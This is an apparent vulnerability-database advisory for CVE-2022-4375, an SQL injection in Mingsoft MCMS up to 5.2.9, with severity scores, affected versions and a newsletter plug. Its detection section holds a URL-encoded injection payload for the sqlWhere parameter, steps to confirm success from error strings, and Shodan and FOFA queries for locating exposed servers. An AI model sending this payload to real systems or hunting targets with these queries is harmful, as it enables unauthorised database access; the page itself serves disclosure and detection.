cbcvebase.
CVE-2022-4375
published 2022-12-09

CVE-2022-4375: A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The…

PriorityP264critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.89%
85.1th percentile
A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.

Affected

11 ranges
VendorProductVersion rangeFixed in
mingsoftmcms< 5.2.105.2.10
mingsoftmcms
mingsoftmcms
mingsoftmcms
mingsoftmcms
mingsoftmcms
mingsoftmcms
mingsoftmcms
mingsoftmcms
mingsoftmcms
mingsoftmcms

Detection & IOCsextracted from sources · hover to see the quote

url/cms/category/list
commandsqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d
otherhttp.favicon.hash:1464851260
othericon_hash="1464851260"
  • Exploit sends a POST request to /cms/category/list with a URL-encoded JSON payload in the sqlWhere parameter containing extractvalue(0x7e,concat(0x7e,(database()))) to trigger SQL injection.
  • Successful exploitation is indicated by a 500 or 200 HTTP response containing 'java.sql.SQLSyntaxErrorException' or 'java.sql.SQLException' in the response body.
  • Response body may also contain 'Icategorydao.xml' or 'cms_category' as additional confirmation of SQL injection triggering the MCMS category DAO layer.
  • Fingerprint the target as Mingsoft MCMS by checking the HTTP response body for the string 'mingsoft.net' before attempting exploitation.
  • Use Shodan query http.favicon.hash:1464851260 or FOFA query icon_hash="1464851260" to identify internet-exposed Mingsoft MCMS instances.
  • ·The vulnerability affects Mingsoft MCMS versions up to and including 5.2.9; version 5.2.10 is patched.
  • ·The endpoint /cms/category/list accepts the sqlWhere parameter via POST with Content-Type application/x-www-form-urlencoded; the injection is in the sqlWhere field which is passed unsanitized to the SQL layer.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.